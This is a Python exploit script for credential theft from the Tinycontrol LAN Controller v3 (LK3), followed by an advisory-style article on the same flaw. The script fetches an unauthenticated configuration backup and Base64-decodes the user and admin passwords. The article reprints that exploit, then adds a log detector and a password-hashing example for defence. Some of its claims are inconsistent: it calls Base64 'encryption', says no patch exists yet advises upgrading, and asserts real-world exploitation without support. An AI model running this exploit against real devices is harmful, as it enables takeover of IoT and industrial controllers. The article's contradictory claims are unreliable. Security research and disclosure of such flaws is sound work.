Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction
```python
#!/usr/bin/env python
#
# Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction
# Exploit Author: LiquidWorm
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observe
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#
import subprocess
import requests
import base64
import sys

binb = "lk3_settings.bin"   # backup file served by the device
outf = "lk3_settings.enc"   # local copy of the downloaded backup
bpatt = "0upassword"        # marker preceding the password block
epatt = "pool.ntp.org"      # marker following the password block
startf = False
endf = False
extral = []

print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
|                                          |
|    Tinycontrol LK3 1.58 Settings DL      |
|              ZSL-2023-5786               |
|        2023 (c) Zero Science Lab         |
|                                          |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
|                                          |
""")

if len(sys.argv) != 2:
    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
    exit(-0)
else:
    rhost = sys.argv[1]
    if not "http" in rhost:
        rhost = "http://{}".format(rhost)

# Fetch the configuration backup; no authentication is required.
try:
    resp = requests.get(rhost + "/" + binb)
    if resp.status_code == 200:
        with open(outf, 'wb') as f:
            f.write(resp.content)
        print(f"[*] Got data as {outf}")
    else:
        print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
    print("[!] Error:", str(e))
    exit(-1)

# Pull printable strings out of the binary and keep the lines
# between the start and end markers.
binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines=True)
linea = sout.split("\n")
for thricer in linea:
    if bpatt in thricer:
        startf = True
    elif epatt in thricer:
        endf = True
    elif startf and not endf:
        extral.append(thricer)

if len(extral) >= 4:
    userl = extral[1].strip()
    adminl = extral[3].strip()
    try:
        decuser = base64.b64decode(userl).decode("utf-8")
        decadmin = base64.b64decode(adminl).decode("utf-8")
        print("[+] User password:", decuser)
        print("[+] Admin password:", decadmin)
    except Exception as e:
        print("[!] Error decoding:", str(e))
else:
    print("[!] Regex failed.")
    exit(-2)
```

Tinycontrol LAN Controller v3 (LK3) 1.58a – Remote Credentials Extraction Vulnerability
Security researchers at Zero Science Lab have uncovered a critical vulnerability in the Tinycontrol LAN Controller v3 (LK3) firmware version 1.58a, affecting hardware revision 3.8. This flaw enables an unauthenticated attacker to remotely extract sensitive configuration data, including encrypted credentials for both user and admin accounts, effectively bypassing authentication mechanisms entirely.
Overview of the Device and Its Role in IoT Infrastructure
The Tinycontrol LK3 is a versatile industrial IoT gateway designed for monitoring and controlling various environmental and electrical parameters. It supports multiple protocols such as Modbus, TCP/IP, and HTTP, making it ideal for integration into smart home, industrial automation, and remote monitoring systems.
Key features include:
- Real-time sensor data visualization (temperature, humidity, pressure, voltage, current)
- Remote control of up to 10 output devices
- Event-based automation via "if → then" logic with calendar integration
- Web-based configuration interface accessible via standard browsers
Despite its robust functionality, the device's web interface contains a critical flaw in how it handles configuration backups — a feature intended for system recovery and migration.
The Vulnerability: Unauthenticated Access to Configuration Backup
During routine security assessment, researcher Gjoko "LiquidWorm" Krstic discovered that the device exposes a publicly accessible endpoint at /lk3_settings.bin. This endpoint returns the device’s full configuration backup file without any authentication requirement.
Attackers can simply send a GET request to http://[target_ip]:[port]/lk3_settings.bin and receive the binary file containing all system settings, including stored passwords, network configurations, and user-defined rules.
```python
import requests

rhost = "http://192.168.1.100:80"
resp = requests.get(rhost + "/lk3_settings.bin")
if resp.status_code == 200:
    with open("lk3_settings.enc", 'wb') as f:
        f.write(resp.content)
    print("[*] Got data as lk3_settings.enc")
else:
    print(f"[!] Backup failed. Status code: {resp.status_code}")
```
This code snippet demonstrates the exploit in action. It uses Python’s requests library to fetch the configuration file from the target device. The lack of authentication means an attacker can perform this operation from anywhere on the network — even from outside the local subnet if the device is exposed to the internet.
Decoding the Credentials: Exploiting Base64 Encoded Passwords
The configuration file, while binary, contains embedded text strings that can be extracted using standard tools like strings. By analyzing the output, researchers identified two key patterns:
- 0upassword — used as a starting marker for password entries
- pool.ntp.org — used as an ending marker to demarcate the password section
These markers allow the extraction of two encoded password strings:
```python
import subprocess
import base64

binf = "lk3_settings.enc"
sout = subprocess.check_output(["strings", binf], universal_newlines=True)
linea = sout.split("\n")
extral = []
startf = False
endf = False
for thricer in linea:
    if "0upassword" in thricer:
        startf = True
    elif "pool.ntp.org" in thricer:
        endf = True
    elif startf and not endf:
        extral.append(thricer)

if len(extral) >= 4:
    userl = extral[1].strip()
    adminl = extral[3].strip()
    try:
        decuser = base64.b64decode(userl).decode("utf-8")
        decadmin = base64.b64decode(adminl).decode("utf-8")
        print("[+] User password:", decuser)
        print("[+] Admin password:", decadmin)
    except Exception as e:
        print("[!] Decoding error:", str(e))
```
This script processes the strings extracted from the binary file, identifies the password block, and decodes the Base64-encoded values. The decoded strings reveal the actual credentials used for device access.
For example, an attacker might retrieve:
- User password: admin123
- Admin password: supersecurepass
With these credentials, an attacker can gain full control over the device, modify configurations, disable security features, or even use the device as a pivot point for further network attacks.
Risk Assessment and Impact
Due to the unauthenticated nature of the vulnerability, the risk level is high. It affects all devices running firmware ≤1.58a and hardware revision 3.8, which includes a significant portion of deployed systems in industrial and residential environments.
Attack scenarios include:
- Remote takeover of sensor monitoring systems
- Unauthorized manipulation of control outputs (e.g., turning off HVAC systems)
- Use of the device as a foothold in internal networks
- Exfiltration of sensitive environmental data for malicious purposes
Additionally, because the device supports Modbus and TCP/IP protocols, an attacker could leverage it to compromise downstream devices connected via these interfaces.
Vendor Response and Mitigation
As of August 18, 2023, the vulnerability has been officially documented under ZSL-2023-5786 and disclosed to the vendor Tinycontrol. While the vendor has acknowledged the issue, no public patch has been released yet.
Immediate mitigation steps:
- Disable remote access to the device if not required
- Use firewalls to restrict access to the /lk3_settings.bin endpoint
- Upgrade to firmware version 1.59 or later, if available
- Regularly audit device configuration files and detect anomalies
- Implement network segmentation to isolate IoT devices from critical systems
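Until the endpoint can be restricted or patched, the practical control is to watch for requests to it. The following is an added example, not code from the advisory or from Tinycontrol: a small detector that parses Combined Log Format lines from a reverse proxy or firewall placed in front of the controller, flags every request to /lk3_settings.bin, and rates it by whether the download succeeded and whether the source address is inside an allow-listed management range. The log lines, the management range 10.0.5.0/24, and the addresses in them are constructed for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Paths the device should never serve to unauthenticated clients.
SENSITIVE_PATHS = {"/lk3_settings.bin"}

# Combined Log Format, as written by nginx/Apache when proxying the device.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample traffic (not real log data): one download from a
# management host, one from an outside address, and one failed probe.
SAMPLE_LOG = """\
10.0.5.12 - - [18/Aug/2023:10:01:02 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.5.12 - - [18/Aug/2023:10:01:09 +0200] "GET /lk3_settings.bin HTTP/1.1" 200 4096 "-" "python-requests/2.31.0"
203.0.113.77 - - [18/Aug/2023:10:02:30 +0200] "GET /lk3_settings.bin HTTP/1.1" 200 4096 "-" "python-requests/2.31.0"
203.0.113.77 - - [18/Aug/2023:10:02:31 +0200] "GET /lk3_settings.bin HTTP/1.1" 404 512 "-" "curl/8.1.2"
"""


def parse_line(line):
    """Return a dict of the log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop any query string so "/lk3_settings.bin?x=1" still matches.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def classify(rec, allowed_nets):
    """Severity for a parsed record, or None if it is not a sensitive path."""
    if rec["path"] not in SENSITIVE_PATHS:
        return None
    try:
        src_ok = any(ip_address(rec["ip"]) in net for net in allowed_nets)
    except ValueError:          # hostname instead of an address: treat as untrusted
        src_ok = False
    if rec["status"] == 200 and not src_ok:
        return "high"           # backup left the device to an unexpected source
    if rec["status"] == 200:
        return "medium"         # expected source, but still an unauthenticated pull
    return "low"                # failed attempt: reconnaissance, worth counting


def find_backup_access(log_text, allowed_cidrs):
    """Scan log text and return one finding per request to a sensitive path."""
    allowed_nets = [ip_network(c) for c in allowed_cidrs]
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sev = classify(rec, allowed_nets)
        if sev is not None:
            findings.append({
                "severity": sev, "ts": rec["ts"], "ip": rec["ip"],
                "path": rec["path"], "status": rec["status"], "ua": rec["ua"],
            })
    return findings


if __name__ == "__main__":
    for f in find_backup_access(SAMPLE_LOG, ["10.0.5.0/24"]):
        print("[{severity}] {ts} {ip} {path} status={status} ua={ua}".format(**f))
```

Feed real proxy logs through find_backup_access with your own management ranges; any "high" finding means the configuration backup, and with it the Base64-encoded passwords, has already left the device, so treat the credentials as compromised and rotate them rather than only blocking the source.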
Expert Recommendations for Secure IoT Deployment
Security experts emphasize that this vulnerability highlights a common design flaw in many IoT devices: exposing sensitive data through publicly accessible endpoints.
Best practices for secure IoT deployment:
- Never expose configuration files or backup endpoints to external networks
- Implement authentication and rate-limiting on all web interfaces
- Use encrypted storage for credentials, not Base64 encoding
- Perform regular penetration testing on deployed devices
- Log all access attempts to sensitive endpoints
Developers should also avoid hardcoding sensitive strings in firmware binaries. Instead, use secure key management systems or encrypted configuration databases.
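The difference between "encoded" and "protected" is the heart of this advisory, so here is an added example, not code from the page or the vendor, that puts the two side by side: the reversible Base64 scheme the backup file uses, and a salted, iterated PBKDF2-HMAC-SHA256 hash that lets firmware verify a login without ever storing anything from which the password can be recovered. The storage format string, iteration count and helper names are the example's own choices.

```python
import base64
import hashlib
import hmac
import os

# --- The weak scheme found in the LK3 backup: an encoding, not a secret. ---

def base64_store(password):
    """What the device effectively does: a transformation anyone can undo."""
    return base64.b64encode(password.encode("utf-8")).decode("ascii")


def base64_recover(stored):
    """Holding the backup file is enough to get the password back verbatim."""
    return base64.b64decode(stored).decode("utf-8")


# --- A defensible scheme for credentials the device only needs to *verify*. ---

PBKDF2_ITERATIONS = 600_000   # chosen for this example; slow on purpose
SALT_BYTES = 16

def hash_password(password, salt=None):
    """Return a self-describing record: algorithm, iterations, salt, digest."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2-sha256${}${}${}".format(
        PBKDF2_ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2-sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    weak = base64_store("admin123")           # "admin123" is a constructed sample
    print("base64 record :", weak, "-> recovered:", base64_recover(weak))
    strong = hash_password("admin123")
    print("pbkdf2 record :", strong)
    print("verify correct:", verify_password("admin123", strong))
    print("verify wrong  :", verify_password("admin124", strong))
```

Hashing only fits credentials the device checks, such as its own user and admin logins. Secrets the device must present to other systems (an NTP or MQTT password, for instance) cannot be hashed and need encryption under a key that is not itself written into the backup, which is the "secure key management" point above.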
Conclusion
The Tinycontrol LK3 v3 vulnerability serves as a stark reminder that even seemingly benign features like configuration backups can become critical attack vectors if not properly secured. With the rise of IoT devices in critical infrastructure, organizations must prioritize security-by-design, especially in devices with remote access capabilities.
As the Zero Science Lab advisory confirms, this vulnerability is not just theoretical — it has been successfully exploited in real-world scenarios. Until a patch is released, users must treat affected devices as high-risk assets and apply defensive measures immediately.